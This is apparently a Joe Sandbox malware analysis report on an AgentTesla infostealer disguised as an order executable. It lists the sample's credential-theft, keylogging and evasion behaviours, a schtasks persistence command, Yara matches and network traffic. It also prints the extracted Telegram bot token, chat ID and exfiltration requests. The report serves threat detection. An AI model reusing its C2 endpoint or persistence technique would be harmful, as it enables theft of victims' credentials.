Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER (6256 OS)#391 PI.exe

Overview

General Information

Sample Name:ORDER (6256 OS)#391 PI.exe
Analysis ID:764027
MD5:19081ef2a08f678a3203b29124043c41
SHA1:e86acea06a600f170402a0c1020c25ac2550ffa0
SHA256:2f356283c209400c6385a24450f266b59477e035e9389c8d1af4843cd1ad2374
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • ORDER (6256 OS)#391 PI.exe (PID: 1688 cmdline: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe MD5: 19081EF2A08F678A3203B29124043C41)
    • schtasks.exe (PID: 5964 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WsdnBq.exe (PID: 6004 cmdline: C:\Users\user\AppData\Roaming\WsdnBq.exe MD5: 19081EF2A08F678A3203B29124043C41)
    • schtasks.exe (PID: 2224 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WsdnBq.exe (PID: 1328 cmdline: {path} MD5: 19081EF2A08F678A3203B29124043C41)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage?chat_id=1644584536"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x22d8b:$a20: get_LastAccessed
      • 0x24dde:$a30: set_GuidMasterKey
      • 0x22e59:$a33: get_Clipboard
      • 0x22e67:$a34: get_Keyboard
      • 0x23f96:$a35: get_ShiftKeyDown
      • 0x23fa7:$a36: get_AltKeyDown
      • 0x22e74:$a37: get_Password
      • 0x23882:$a38: get_PasswordHash
      • 0x246a9:$a39: get_DefaultCredentials
      00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0xfb66b:$a20: get_LastAccessed
      • 0x12368b:$a20: get_LastAccessed
      • 0xfd6be:$a30: set_GuidMasterKey
      • 0x1256de:$a30: set_GuidMasterKey
      • 0xfb739:$a33: get_Clipboard
      • 0x123759:$a33: get_Clipboard
      • 0xfb747:$a34: get_Keyboard
      • 0x123767:$a34: get_Keyboard
      • 0xfc876:$a35: get_ShiftKeyDown
      • 0x124896:$a35: get_ShiftKeyDown
      • 0xfc887:$a36: get_AltKeyDown
      • 0x1248a7:$a36: get_AltKeyDown
      • 0xfb754:$a37: get_Password
      • 0x123774:$a37: get_Password
      • 0xfc162:$a38: get_PasswordHash
      • 0x124182:$a38: get_PasswordHash
      • 0xfcf89:$a39: get_DefaultCredentials
      • 0x124fa9:$a39: get_DefaultCredentials
      Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
        • 0x24777:$s10: logins
        • 0x242b0:$s11: credential
        • 0x21259:$g1: get_Clipboard
        • 0x21267:$g2: get_Keyboard
        • 0x21274:$g3: get_Password
        • 0x22386:$g4: get_CtrlKeyDown
        • 0x22396:$g5: get_ShiftKeyDown
        • 0x223a7:$g6: get_AltKeyDown
        0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
        • 0x2118b:$a20: get_LastAccessed
        • 0x231de:$a30: set_GuidMasterKey
        • 0x21259:$a33: get_Clipboard
        • 0x21267:$a34: get_Keyboard
        • 0x22396:$a35: get_ShiftKeyDown
        • 0x223a7:$a36: get_AltKeyDown
        • 0x21274:$a37: get_Password
        • 0x21c82:$a38: get_PasswordHash
        • 0x22aa9:$a39: get_DefaultCredentials
        4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
        • 0x26577:$s10: logins
        • 0x260b0:$s11: credential
        • 0x23059:$g1: get_Clipboard
        • 0x23067:$g2: get_Keyboard
        • 0x23074:$g3: get_Password
        • 0x24186:$g4: get_CtrlKeyDown
        • 0x24196:$g5: get_ShiftKeyDown
        • 0x241a7:$g6: get_AltKeyDown
        4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
        • 0x22f8b:$a20: get_LastAccessed
        • 0x24fde:$a30: set_GuidMasterKey
        • 0x23059:$a33: get_Clipboard
        • 0x23067:$a34: get_Keyboard
        • 0x24196:$a35: get_ShiftKeyDown
        • 0x241a7:$a36: get_AltKeyDown
        • 0x23074:$a37: get_Password
        • 0x23a82:$a38: get_PasswordHash
        • 0x248a9:$a39: get_DefaultCredentials
        0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
        • 0x26577:$s10: logins
        • 0x4e597:$s10: logins
        • 0x260b0:$s11: credential
        • 0x4e0d0:$s11: credential
        • 0x23059:$g1: get_Clipboard
        • 0x4b079:$g1: get_Clipboard
        • 0x23067:$g2: get_Keyboard
        • 0x4b087:$g2: get_Keyboard
        • 0x23074:$g3: get_Password
        • 0x4b094:$g3: get_Password
        • 0x24186:$g4: get_CtrlKeyDown
        • 0x4c1a6:$g4: get_CtrlKeyDown
        • 0x24196:$g5: get_ShiftKeyDown
        • 0x4c1b6:$g5: get_ShiftKeyDown
        • 0x241a7:$g6: get_AltKeyDown
        • 0x4c1c7:$g6: get_AltKeyDown
        Click to see the 3 entries

        Persistence and Installation Behavior

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe, ParentImage: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe, ParentProcessId: 1688, ParentProcessName: ORDER (6256 OS)#391 PI.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp, ProcessId: 5964, ProcessName: schtasks.exe
        Timestamp:192.168.2.4149.154.167.220496964432851779 12/09/22-10:19:40.984166
        SID:2851779
        Source Port:49696
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.4149.154.167.220496984432851779 12/09/22-10:20:17.013980
        SID:2851779
        Source Port:49698
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: ORDER (6256 OS)#391 PI.exeReversingLabs: Detection: 30%
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeReversingLabs: Detection: 30%
        Source: ORDER (6256 OS)#391 PI.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeJoe Sandbox ML: detected
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage?chat_id=1644584536"}
        Source: WsdnBq.exe.1328.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage"}
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
        Source: Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

        Networking

        barindex
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49696 -> 149.154.167.220:443
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownDNS query: name: api.telegram.org
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d46448f6a9Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
        Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
        Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
        Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
        Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000003.535612424.00000000015F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301689714.0000000005F13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307345140.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304196469.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304651333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304139159.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305855891.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306476107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304491242.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303482107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305929932.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304437139.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307312499.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304413252.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306400487.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303216869.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303104333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306139248.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304750887.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304466931.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305354155.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303996945.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303155186.0000000005F13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comigXje
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304887480.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com9
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF.
